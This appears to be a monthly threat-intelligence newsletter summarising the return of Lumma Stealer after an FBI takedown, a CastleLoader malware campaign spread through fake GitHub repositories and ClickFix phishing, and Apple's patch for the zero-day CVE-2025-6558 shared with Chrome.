Media Organizations 
Civil Society 
Vulnerable Groups 
Businesses 
Cyber Security Enthusiasts 
Threat Intelligence 
This month focuses on the return of Lumma Stealer, the CastleLoader campaign using fake GitHub repos to infect devices, and a security Apple patch that was exploited as a Zero-Day in Google Chrome.
Lumma Stealer Returns
Lumma Stealer resumed operations just weeks after the FBI disrupted their activities in May 2025, even regaining pre-takedown targeting levels.
Summary
- The group now uses more discreet distribution channels and improved evasion methods to avoid detection.
- Pre-takedown, Lumma relied heavily on Cloudflare to hide malicious domains; post-takedown, reliance has dropped in favor of providers less responsive to law enforcement, such as Russia-based Selectel.
- Before the disruption, Lumma deployed about 74 new domains weekly, totaling over 3,300 unique C2 domains in a year.
- Lumma campaigns use cracked software, malicious key generators, compromised websites, and fake browser updates to lure victims.
- Attackers inject JavaScript into hacked websites to display fake CAPTCHA pages, which lead to malware downloads.
- Threat actors auto-create GitHub accounts and repositories with AI-generated README files promoting game cheats or exploits that deliver Lumma.
- YouTube videos with hidden malware in software cracks and Facebook ads linking to malicious sites remain active distribution channels.
- Lumma has been linked to ransomware, crypto theft, BEC, account hijacking, and cyber-espionage, and is sold as malware-as-a-service to attackers with little technical skill.
- Organizations should strengthen threat intelligence sharing, train employees to recognize deceptive software and social media threats, and use layered cybersecurity tools for protection.
- Read more about it here
CastleLoader Campaign Uses Fake GitHub Repos To Infect Devices
A growing campaign using ClickFix Phishing and CastleLoader Malware has been infecting Devices using fake Github Repos.
Summary
- A newly discovered malware loader used to distribute various information stealers (e.g., DeerStealer, RedLine, StealC) and RATs (e.g., NetSupport RAT, SectopRAT), as well as other loaders like Hijack Loader.
- The malware is delivered through Cloudflare-themed ClickFix phishing campaigns and fake GitHub repositories impersonating legitimate applications and tools.
- Fake domains posing as software libraries, videoconferencing platforms, browser updates, or document verification systems are used to trick victims into running malicious PowerShell commands.
- The campaign leverages developers’ trust in GitHub by hosting fraudulent repositories that appear reputable, encouraging users to unknowingly install malware.
- Code injection, runtime unpacking, anti-sandboxing, obfuscation, and modular architecture are some of the tactics employed to hinder detection and analysis.
- The modular structure of the malware acts as both a delivery mechanism and a staging utility, separating the initial infection from final payload deployment to complicate attribution and incident response.
- Since May 2025, seven distinct C2 servers have been used, with over 1,634 infection attempts recorded and 469 confirmed compromises (28.7% infection rate).
- Read more about it here.
Apple Patch Safari Vulnerability
Apple has released security updates across all its software platforms to address a high-severity zero-day vulnerability tracked as CVE-2025-6558 (CVSS 8.8).
Summary
- The flaw, caused by incorrect validation of untrusted input in Chrome’s ANGLE and GPU components, could allow a sandbox escape via crafted HTML pages.
- Discovered by Google TAG researchers Clément Lecigne and Vlad Stolyarov, Google confirmed that an exploit for this vulnerability is already active in the wild.
- The issue also affects Apple’s WebKit browser engine, which powers Safari, and could lead to crashes when processing maliciously crafted web content.
- Due to WebKit’s cross-platform use, the vulnerability impacts iPhones, iPads, Macs, Apple TV, Apple Watch, and Apple Vision Pro, with fixes now available in the latest iOS, iPadOS, macOS, tvOS, watchOS, and visionOS updates.
- While there’s no evidence of Apple device users being targeted, updating to the latest versions is strongly recommended for maximum protection.
- To read more about it here
